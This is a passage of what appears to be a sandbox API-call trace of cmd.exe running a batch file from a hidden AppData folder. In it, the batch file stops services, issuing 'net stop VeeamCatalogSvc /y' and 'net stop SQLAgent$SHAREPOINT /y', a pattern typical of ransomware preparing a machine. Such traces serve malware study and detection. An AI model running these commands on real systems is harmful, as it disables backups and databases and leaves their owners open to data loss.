_wcsicmp (_String1="net", _String2="TITLE") returned -6 [0204.194] _wcsicmp (_String1="net", _String2="START") returned -5 [0204.195] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0204.195] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0204.195] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0204.195] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0204.195] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0204.195] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0204.195] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0204.195] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0204.195] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0204.195] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0204.195] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0204.195] SetErrorMode (uMode=0x0) returned 0x1 [0204.195] GetProcessHeap () returned 0x3e0000 [0204.195] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0204.195] GetProcessHeap () returned 0x3e0000 [0204.195] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0204.196] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.196] GetProcessHeap () returned 0x3e0000 [0204.196] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0204.196] GetProcessHeap () returned 0x3e0000 [0204.196] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0204.196] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0204.196] GetProcessHeap () returned 0x3e0000 [0204.196] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0204.196] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.196] GetProcessHeap () returned 0x3e0000 [0204.196] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0204.197] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0204.197] GetProcessHeap () returned 0x3e0000 [0204.197] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0204.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.197] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.198] GetLastError () returned 0x2 [0204.198] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.198] GetLastError () returned 0x2 [0204.198] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.199] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0204.199] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0204.199] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.199] GetLastError () returned 0x2 [0204.200] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0204.200] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0204.200] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.201] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0204.201] SetErrorMode (uMode=0x0) returned 0x1 [0204.201] GetProcessHeap () returned 0x3e0000 [0204.201] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0204.201] GetProcessHeap () returned 0x3e0000 [0204.201] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0204.201] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.201] GetProcessHeap () returned 0x3e0000 [0204.201] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0204.201] GetProcessHeap () returned 0x3e0000 [0204.201] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0204.202] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0204.202] GetProcessHeap () returned 0x3e0000 [0204.202] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0204.202] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.202] GetProcessHeap () returned 0x3e0000 [0204.202] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0204.202] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0204.202] GetProcessHeap () returned 0x3e0000 [0204.202] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0204.202] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.203] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.203] GetLastError () returned 0x2 [0204.203] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.203] GetLastError () returned 0x2 [0204.204] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.204] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0204.204] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0204.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.205] GetLastError () returned 0x2 [0204.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0204.205] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0204.206] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.206] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0204.206] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0204.206] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0204.206] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0204.206] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamCatalogSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamCatalogSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamCatalogSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xbf0, dwThreadId=0x6f8)) returned 1 [0204.210] CloseHandle (hObject=0x74) returned 1 [0204.210] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0204.210] GetProcessHeap () returned 0x3e0000 [0204.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.210] GetEnvironmentStringsW () returned 0x3f8408* [0204.210] GetProcessHeap () returned 0x3e0000 [0204.210] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.211] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.211] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0204.346] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0204.346] CloseHandle (hObject=0x78) returned 1 [0204.346] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0204.347] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0204.347] GetProcessHeap () returned 0x3e0000 [0204.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.347] GetEnvironmentStringsW () returned 0x3f8408* [0204.347] GetProcessHeap () returned 0x3e0000 [0204.347] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.347] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.347] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.347] GetProcessHeap () returned 0x3e0000 [0204.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.348] GetEnvironmentStringsW () returned 0x3f8408* [0204.348] GetProcessHeap () returned 0x3e0000 [0204.348] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.348] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.348] GetProcessHeap () returned 0x3e0000 [0204.348] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0204.348] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0204.348] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.348] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0204.348] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.348] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0204.348] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.348] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0204.348] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.349] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0204.349] SetConsoleInputExeNameW () returned 0x1 [0204.349] GetConsoleOutputCP () returned 0x1b5 [0204.349] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0204.349] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.349] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0204.349] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0204.349] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.349] SetFilePointer (in: hFile=0x78, lDistanceToMove=3763, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xeb3 [0204.349] GetProcessHeap () returned 0x3e0000 [0204.349] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0204.349] GetProcessHeap () returned 0x3e0000 [0204.349] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0204.350] GetProcessHeap () returned 0x3e0000 [0204.350] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0204.350] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.350] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xeb3 [0204.350] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xa0e, lpOverlapped=0x0) returned 1 [0204.350] SetFilePointer (in: hFile=0x78, lDistanceToMove=3796, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xed4 [0204.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$SHAREPOINT /y\r\n/y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 33 [0204.351] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.351] GetFileType (hFile=0x78) returned 0x1 [0204.351] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.351] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xed4 [0204.351] GetProcessHeap () returned 0x3e0000 [0204.351] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0204.351] GetProcessHeap () returned 0x3e0000 [0204.351] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0204.354] _tell (_FileHandle=3) returned 3796 [0204.354] _close (_FileHandle=3) returned 0 [0204.354] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0204.354] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0204.354] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0204.354] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0204.354] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0204.354] _wcsicmp (_String1="net", _String2="CD") returned 11 [0204.354] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0204.354] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0204.354] _wcsicmp (_String1="net", _String2="REN") returned -4 [0204.354] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0204.354] _wcsicmp (_String1="net", _String2="SET") returned -5 [0204.354] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0204.354] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0204.355] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0204.355] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0204.355] _wcsicmp (_String1="net", _String2="MD") returned 1 [0204.355] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0204.355] _wcsicmp (_String1="net", _String2="RD") returned -4 [0204.355] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0204.355] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0204.355] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0204.355] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0204.355] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0204.355] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0204.355] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0204.355] _wcsicmp (_String1="net", _String2="VER") returned -8 [0204.355] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0204.355] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0204.355] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0204.355] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0204.355] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0204.355] _wcsicmp (_String1="net", _String2="START") returned -5 [0204.355] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0204.355] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0204.355] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0204.355] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0204.355] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0204.355] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0204.355] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0204.355] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0204.355] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0204.355] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0204.356] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0204.356] SetErrorMode (uMode=0x0) returned 0x1 [0204.356] GetProcessHeap () returned 0x3e0000 [0204.356] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0204.356] GetProcessHeap () returned 0x3e0000 [0204.356] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0204.356] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.356] GetProcessHeap () returned 0x3e0000 [0204.356] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0204.356] GetProcessHeap () returned 0x3e0000 [0204.356] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0204.357] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0204.357] GetProcessHeap () returned 0x3e0000 [0204.357] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0204.357] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.357] GetProcessHeap () returned 0x3e0000 [0204.357] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0204.357] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0204.357] GetProcessHeap () returned 0x3e0000 [0204.357] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0204.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.358] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.358] GetLastError () returned 0x2 [0204.358] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.358] GetLastError () returned 0x2 [0204.359] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.359] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0204.359] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0204.360] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.360] GetLastError () returned 0x2 [0204.360] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0204.360] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0204.361] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.361] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0204.361] SetErrorMode (uMode=0x0) returned 0x1 [0204.361] GetProcessHeap () returned 0x3e0000 [0204.361] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0204.361] GetProcessHeap () returned 0x3e0000 [0204.361] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0204.362] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.362] GetProcessHeap () returned 0x3e0000 [0204.362] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0204.362] GetProcessHeap () returned 0x3e0000 [0204.362] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0204.362] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0204.362] GetProcessHeap () returned 0x3e0000 [0204.362] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0204.362] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.362] GetProcessHeap () returned 0x3e0000 [0204.363] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0204.363] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0204.363] GetProcessHeap () returned 0x3e0000 [0204.363] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0204.363] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.364] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.364] GetLastError () returned 0x2 [0204.364] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 